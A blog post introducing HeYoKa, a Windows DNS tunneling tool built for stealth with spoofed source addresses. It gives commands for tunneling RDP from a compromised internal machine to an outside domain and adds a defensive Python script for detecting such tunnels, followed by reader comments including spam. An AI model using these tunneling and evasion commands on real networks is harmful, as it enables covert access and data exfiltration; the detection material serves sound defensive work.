Hi folks, today I tried HeYoKa for the first time. As you probably know, on Linux systems it is pretty easy to build a DNS tunnel and get past most of the captive portals around the globe, but what about Windows? Well, HeYoKa makes it easy.
Heyoka is a DNS tunneling tool aiming for both performance and stealth, released under the GPLv2.
The tunnel is up to 60% faster than existing tools, thanks to a different encoding used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.
Heyoka is 100% written in C, which means that it runs natively without needing an interpreter installed on the machine, which is extremely useful in a penetration testing scenario.
The overall idea is to create a useful tunneling tool, and at the same time investigate new patterns of data exfiltration that use spoofed packets to avoid detection.
We presented heyoka at multiple conferences. Have a look at the slides from Shakacon if you want the bigger picture … or just download it and try! 🙂

How do I get heyoka to run?

Start by running heyoka in master mode on the machine that is the authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g. RDP), the syntax is as follows:

heyoka.exe -m -d mydomain.com -l -p 8080

This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:

heyoka.exe -s -d mydomain.com -p 3389

This will create the tunnel, and all you have to do is fire off an RDP client and point it at the ‘master’ machine on port 8080.

If it’s the internal/compromised machine that needs to contact a service on the external box, simply use ‘-l’ (which stands for ‘listen’) on the master side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.
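The two properties the post highlights (every query carries a fresh chunk of encoded payload under one domain, and the queries are spread across spoofed internal source addresses and several name servers) are also what a defender can key on. The following is an added example from the detection side, not code from this post or from the heyoka project: it parses constructed resolver log lines in an assumed `src=... qname=... qtype=...` format, aggregates per registered domain rather than per source (so that spoofed sources do not dilute the signal), and flags domains with many distinct, long, high-entropy leftmost labels. The sample data, the log format, the thresholds and the naive two-label `registered_domain` split are all assumptions for the example; `mydomain.com` and the `10.0.0.x` addresses are placeholders.

```python
import base64
import hashlib
import math
import re
from collections import Counter, defaultdict

# Constructed resolver log lines (not real traffic). The first few are ordinary
# lookups; the tunnel-shaped lines are generated below so that every query
# carries a different, random-looking label under one domain and the queries
# are spread across several internal source addresses, as the post describes.
BENIGN_LINES = [
    "2024-05-01T09:00:01 src=10.0.0.5 qname=www.example.org qtype=A",
    "2024-05-01T09:00:02 src=10.0.0.7 qname=mail.example.org qtype=MX",
    "2024-05-01T09:00:03 src=10.0.0.5 qname=www.example.org qtype=A",
    "2024-05-01T09:00:04 src=10.0.0.9 qname=mail.example.org qtype=A",
]


def constructed_tunnel_lines(n=40):
    """Deterministically build n tunnel-shaped queries (constructed sample data)."""
    lines = []
    for i in range(n):
        digest = hashlib.sha256(f"constructed-chunk-{i}".encode()).digest()
        label = base64.b32encode(digest).decode().lower()[:24]
        src = f"10.0.0.{10 + i % 4}"  # four different internal sources per domain
        lines.append(
            f"2024-05-01T09:01:{i % 60:02d} src={src} "
            f"qname={label}.tun.mydomain.com qtype=TXT"
        )
    return lines


SAMPLE_LOG = "\n".join(BENIGN_LINES + constructed_tunnel_lines())

# Assumed log format; a real resolver (BIND, Unbound, Windows DNS) needs its own parser.
LINE_RE = re.compile(r"src=(?P<src>\S+)\s+qname=(?P<qname>\S+)\s+qtype=(?P<qtype>\S+)")


def parse_log(text):
    """Yield a dict with src/qname/qtype for every line matching the assumed format."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.groupdict()


def registered_domain(qname):
    """Naive zone split (last two labels). Real deployments use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s):
    """Bits per character of a label; encoded payload scores far above ordinary hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def profile_domains(records):
    """Aggregate per registered domain, not per source, so spoofed sources cannot dilute the signal."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "sources": set(),
                                 "entropies": [], "label_lens": []})
    for r in records:
        qname = r["qname"].rstrip(".").lower()
        dom = registered_domain(qname)
        sub = qname[: -len(dom) - 1] if qname.endswith("." + dom) else ""
        s = stats[dom]
        s["queries"] += 1
        s["sources"].add(r["src"])
        s["subdomains"].add(sub)
        if sub:
            first = sub.split(".")[0]  # leftmost label is where a payload chunk would sit
            s["entropies"].append(shannon_entropy(first))
            s["label_lens"].append(len(first))
    return stats


def flag_tunnel_candidates(stats, min_unique=20, min_entropy=3.5, min_label_len=16):
    """Flag domains with many distinct, long, high-entropy labels. Thresholds are assumptions to tune per network."""
    flagged = {}
    for dom, s in stats.items():
        uniq = len(s["subdomains"])
        if uniq < min_unique or not s["entropies"]:
            continue
        mean_entropy = sum(s["entropies"]) / len(s["entropies"])
        mean_len = sum(s["label_lens"]) / len(s["label_lens"])
        if mean_entropy >= min_entropy and mean_len >= min_label_len:
            flagged[dom] = {
                "queries": s["queries"],
                "unique_subdomains": uniq,
                "sources": len(s["sources"]),
                "mean_entropy": round(mean_entropy, 2),
                "mean_label_len": round(mean_len, 1),
            }
    return flagged


def analyze(log_text):
    """Run the whole pipeline over one log text and return the flagged domains."""
    return flag_tunnel_candidates(profile_domains(parse_log(log_text)))


if __name__ == "__main__":
    for dom, info in analyze(SAMPLE_LOG).items():
        print(f"{dom}: {info}")
```

Run as-is it reports only `mydomain.com`, with 40 queries, 40 unique subdomains and 4 distinct sources; `example.org` stays quiet because it has only a handful of short, low-entropy hostnames. Per-source counting would show each of the four addresses sending just ten queries, which is why the aggregation is per domain; the same reasoning applies when the traffic is split across several authoritative name servers, so correlating on the queried zone rather than on the server address is the more robust choice.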

6 thoughts on “DNS Tunneling: never so easy”

  1. Hey,
    I have tried it the way the heyoka instructions show, but then I met a problem when I tried to run it in master mode on the name server: bind failed. As follows:

    E:\>heyoka -m -d mydomain -l -p 8080
    [DEBUG] Starting server mode…
    [DEBUG]: Master starting for (master.out.com) listening on 53/UDP
    [ERROR]: bind failed
    (10048)
    [ERROR]: cannot create server udp socket

    Beforehand, I also met a big problem: heyoka seems not to be compiled correctly (so I recompiled one) and cannot run on Windows Server 2003 (this is instructed by heyoka!). I wanted to find something about this on the internet but got nothing..
    So didn't you meet these problems? Hope for your reply, thx~

    piaomiaowuxing#gmail.com

  2. Hey

    You will not believe what I just found! [url=http://www.foolioo.com]Foolioo.com[/url] makes [url=http://www.foolioo.com]free[/url] custom website for free. Yep! That's right, FREE!
    Never figured out it'd be so easy to get a free website and I really had to tell you guys.

    So if you're looking for a free website, give these guys a try.

    Good Bye
